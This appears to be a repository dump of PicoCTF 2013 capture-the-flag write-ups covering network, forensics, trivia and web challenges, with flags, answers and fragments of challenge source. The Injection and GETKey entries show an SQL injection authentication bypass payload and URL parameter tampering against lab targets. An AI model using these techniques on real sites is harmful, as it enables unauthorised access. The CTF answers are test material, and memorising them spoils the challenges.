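    return {ip: count for ip, count in syns.items() if ip not in acked}


if __name__ == "__main__":
    print(" ".join(sorted(syn_sources(SAMPLE, VICTIM))))
```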
38 |
39 | ## Other write-ups and resources
40 |
41 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/ddos-detection/conversations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/conversations.png
--------------------------------------------------------------------------------
/pico-ctf-2013/ddos-detection/syn_attack.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/ddos-detection/syn_attack.pcap
--------------------------------------------------------------------------------
/pico-ctf-2013/failure-to-boot/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Failure To Boot
2 |
3 | **Category:** Trivia
4 | **Points:** 20
5 | **Description:**
6 |
7 | > After opening the robot's front panel and looking inside, you discover a small red button behind a tangle of wires. Pressing the button lights up the robot's primary screen. It glows black and quickly flashes blue. A line of small text types out:
8 | >
9 | > ```ERROR: 0x00000023```
10 | >
11 | > The text refreshes and displays the prompt:
12 | >
13 | > FILE SYSTEM RECOVERY INITIATED...
14 | >
15 | > FILE SYSTEM COULD NOT BE IDENTIFIED...
16 | >
17 | > PLEASE ENTER FILE SYSTEM FORMAT:
18 |
19 | ## Write-up
20 |
21 | Googling the keyword `ERROR: 0x00000023` gives several results.
22 |
23 | Among them: `STOP 0x00000023 : FAT_FILE_SYSTEM`, a problem with the file "Fastfat.sys".
24 |
25 | **Answer:** FAT
26 |
27 | ## Other write-ups and resources
28 |
29 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/first-contact/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: First Contact
2 |
3 | **Category:** Network
4 | **Points:** 40
5 | **Description:**
6 |
7 | > You notice that the indicator light near the robot’s antenna begins to blink. Perhaps the robot is connecting to a network? Using a wireless card and the network protocol analyzer Wireshark, you are able to create a PCAP file containing the packets sent over the network.
8 | >
9 | > You suspect that the robot is communicating with the crashed ship. Your goal is to find the location of the ship by inspecting the network traffic.
10 | >
11 | > You can perform the analysis online on [Cloudshark](http://www.cloudshark.org/captures/bc1c0a7fae2c) or you can download the [PCAP file](https://2013.picoctf.com/problems/first_contact.pcap).
12 | >
13 | > [file offline](first_contact.pcap)
14 |
15 | ## Write-up
16 |
17 | Open the file with Wireshark, select a TCP packet, and choose Follow TCP Stream:
18 |
19 | ```
20 | AWAITING NEW LOCATION STATUS
21 | NEW LOCATION STATUS: 302
22 | NEW LOCATION COORDINATES: 37 14'06"N 115 48'40"W
23 | NEW LOCATION INFO: LOCKED
24 | NEW LOCATION UPDATE COMPLETE
25 | NEW LOCATION UPDATE SUCCESS
26 | ```
27 |
28 | **Answer:** ```37 14'06"N 115 48'40"W```
29 |
30 | ## Other write-ups and resources
31 |
32 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/first-contact/first_contact.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/first-contact/first_contact.pcap
--------------------------------------------------------------------------------
/pico-ctf-2013/getkey/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: GETKey
2 |
3 | **Category:** WebVuln
4 | **Points:** 50
5 | **Description:**
6 |
7 | > There's bound to be a key on the spaceport's [hidden website](https://2013.picoctf.com/problems/getquery/index.php)
8 |
9 | ## Write-up
10 |
11 | The HTML code is similar to this:
12 |
13 | ```html
14 |
19 | ```
20 |
21 | The part to focus on is ```method="GET"```: the form input is displayed in the URL.
22 |
23 | Original:
24 |
25 | ```
26 | [...]/index.php?admin=false&competition=ccdc
27 | ```
28 |
29 | Solution:
30 |
31 | ```
32 | [...]/index.php?admin=true&competition=picoctf
33 |
34 | FLAG: 9fa449c061d64f58de600dfacaa6bd5d
35 | ```
36 |
37 | **Answer:** 9fa449c061d64f58de600dfacaa6bd5d
38 |
39 | ## Other write-ups and resources
40 |
41 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/getkey/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
16 |
17 |
18 | FLAG: $key");
26 | } else {
27 | echo("Either you aren't admin or wrong competition");
28 | }
29 | ?>
30 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/pico-ctf-2013/grep-is-your-friend/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Grep is Your Friend
2 |
3 | **Category:** Trivia
4 | **Points:** 40
5 | **Description:**
6 |
7 | > After plugging the robot into the computer, the robot asks for the name of a file containing the string `SECRET AUTH CODE`. You can find it using the [command-line interface](https://2013.picoctf.com/webshell) in `/problems/grep.tar` or by downloading [all of the files](https://2013.picoctf.com/problems/grep.tar).
8 | >
9 | > [file offline](grep.tar)
10 |
11 | ## Write-up
12 |
13 | On a Linux host, extract the archive, then use the `grep` command.
14 |
15 | ```bash
16 | $ tar xzvf grep.tar
17 | $ cd grep
18 | $ strings * | grep "SECRET AUTH CODE"
19 | fHYYpdrfeOCHyQicfe96xfw==: SECRET AUTH CODES
20 | ```
21 |
22 | **Answer:** fHYYpdrfeOCHyQicfe96xfw==
23 |
24 | ## Other write-ups and resources
25 |
26 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: In Hex, No One Can Hear You Complain
2 |
3 | **Category:** Forensic
4 | **Points:** 90
5 | **Description:**
6 |
7 | > While flying through the outskirts of the Ripley system, you notice a distress signal from one of the outer moons. It appears a ship has crash-landed near a 16-sided pyramid. The lone survivor, a [docx file](https://2013.picoctf.com/problems/kane.docx), tells you that a malicious programmer has embedded an egg in his chest and he's afraid that it's going to hatch. He offers his assistance if you can help find the egg.
8 | >
9 | > [Offline file](kane.docx)
10 |
11 | ## Write-up
12 |
13 | First, we need to know that a Word file is essentially a normal ZIP file.
14 |
15 | We extract it. The flag isn't difficult to find: `\word\media\key.png`
16 |
17 | 
18 |
19 | **Answer:** docx_why_not_docz
20 |
21 | ## Other write-ups and resources
22 |
23 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/kane.docx
--------------------------------------------------------------------------------
/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/in-hex-no-one-can-hear-you-complain/key.png
--------------------------------------------------------------------------------
/pico-ctf-2013/injection/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Injection
2 |
3 | **Category:** Web Vuln
4 | **Points:** 110
5 | **Description:**
6 |
7 | > Use the Loading Bay Control System to get the admin key! [Problem](https://2013.picoctf.com/problems/injection/)
8 |
9 | ## Write-up
10 |
11 | The challenge is called "Injection" and it's a web based authentication page. Chances are this is some kind of SQL Injection challenge, and we need to be able to bypass the authentication, as we don’t know a valid username.
12 |
13 | Google for [sql-injection-authentication-bypass-cheat-sheet](https://pentestlab.wordpress.com/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/)
14 |
15 | Trying `' OR 1=1 #` triggers the bug:
16 |
17 | ```
18 | Username: user177 Hash: 53e33afe47d6951aa21b90741f11e711
19 |
20 | Username: user178 Hash: 7efdd69b03fbb5cf805419bd1044f558
21 |
22 | Username: admin Hash: bad_code_and_databases_is_no_fun
23 | ```
24 |
25 | **Answer:** bad_code_and_databases_is_no_fun
26 |
27 | ## Other write-ups and resources
28 |
29 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/injection/index.php:
--------------------------------------------------------------------------------
1 |
2 |
3 |